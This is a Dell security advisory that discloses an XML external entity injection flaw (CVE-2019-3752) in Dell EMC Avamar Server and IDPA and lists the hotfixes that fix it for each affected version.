DSA-2019-119: Dell EMC Avamar XML External Entity Injection Vulnerability
Summary: Dell EMC Avamar contains remediation for an XML External Entity Injection vulnerability that may potentially be exploited by malicious users to compromise the affected system.
This article applies to
This article does not apply to
This article is not tied to any specific product.
Not all product versions are identified in this article.
Impact
High
Details
Summary:
Dell EMC Avamar contains remediation for an XML External Entity Injection vulnerability that may potentially be exploited by malicious users to compromise the affected system.
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4 contain an XML External Entity (XXE) Injection vulnerability. A remote unauthenticated malicious user may potentially exploit this vulnerability to cause a Denial of Service or an information exposure by supplying specially crafted document type definitions (DTDs) in an XML request.
CVE-2019-3752
8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4 contain an XML External Entity (XXE) Injection vulnerability. A remote unauthenticated malicious user may potentially exploit this vulnerability to cause a Denial of Service or an information exposure by supplying specially crafted document type definitions (DTDs) in an XML request.
CVE-2019-3752
8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)
Affected Products & Remediation
Affected products:
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1
Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4.
Resolution:
The following Dell EMC Avamar hotfixes addresses this vulnerability:
-
Dell EMC Avamar Server 7.4.1 HOTFIX 311380 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 7.5.0 HOTFIX 311826 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 7.5.1 HOTFIX 311381 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 18.2 HOTFIX 311382 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 19.1 HOTFIX 314375 (Avamar Cumulative Patch)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.0 HOTFIX 311380 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.1 HOTFIX 311826 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.2 HOTFIX 311381 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.3 HOTFIX 311382 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.4 HOTFIX 314375 (Avamar Cumulative Patch)
Dell EMC recommends all customers upgrade at the earliest opportunity.
Refer to KB Article 513978: How to install an Avamar .avp hotfix using Avamar Installer (AVI) for instructions on applying MC Cumulative hotfix. Applying MC Cumulative hotfix would update management console server (MCS) and restart scheduler.
Avamar 19.1 has Avamar cumulative patch consists of all available hotfixes bundled into a single package. Refer to KB Article 537643: How to Install Avamar 19.1 Cumulative Patch HF 314375 for instructions on applying the hotfix. (Only registered Dell Customers can access the content on the article link via Dell.com/support)
Note: Applying 19.1 Cumulative Patch shutdowns and restarts Avamar Services.
Affected products:
Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, and 19.1
Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1, 2.2, 2.3, and 2.4.
Resolution:
The following Dell EMC Avamar hotfixes addresses this vulnerability:
-
Dell EMC Avamar Server 7.4.1 HOTFIX 311380 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 7.5.0 HOTFIX 311826 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 7.5.1 HOTFIX 311381 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 18.2 HOTFIX 311382 (Avamar MC Cumulative)
-
Dell EMC Avamar Server 19.1 HOTFIX 314375 (Avamar Cumulative Patch)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.0 HOTFIX 311380 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.1 HOTFIX 311826 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.2 HOTFIX 311381 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.3 HOTFIX 311382 (Avamar MC Cumulative)
-
Dell EMC Integrated Data Protection Appliance (IDPA) 2.4 HOTFIX 314375 (Avamar Cumulative Patch)
Dell EMC recommends all customers upgrade at the earliest opportunity.
Refer to KB Article 513978: How to install an Avamar .avp hotfix using Avamar Installer (AVI) for instructions on applying MC Cumulative hotfix. Applying MC Cumulative hotfix would update management console server (MCS) and restart scheduler.
Avamar 19.1 has Avamar cumulative patch consists of all available hotfixes bundled into a single package. Refer to KB Article 537643: How to Install Avamar 19.1 Cumulative Patch HF 314375 for instructions on applying the hotfix. (Only registered Dell Customers can access the content on the article link via Dell.com/support)
Note: Applying 19.1 Cumulative Patch shutdowns and restarts Avamar Services.
Revision History
|
Revision |
Date |
Description |
|
1.0 |
2019-10-09 |
Initial Release |
| 1.1 | 2021-11-09 | Product Tagging |
Acknowledgements
Dell EMC would like to thank Harrison Neal for reporting this vulnerability.
Related Information
Legal Disclaimer
Affected Products
Avamar, Avamar Server, PowerProtect Data Protection Software, Integrated Data Protection Appliance Family, PowerProtect Data Protection Hardware, Integrated Data Protection Appliance Software, Product Security InformationArticle Properties
Article Number: 000153702
Article Type: Dell Security Advisory
Last Modified: 09 Nov 2021
Find answers to your questions from other Dell users
Support Services
Check if your device is covered by Support Services.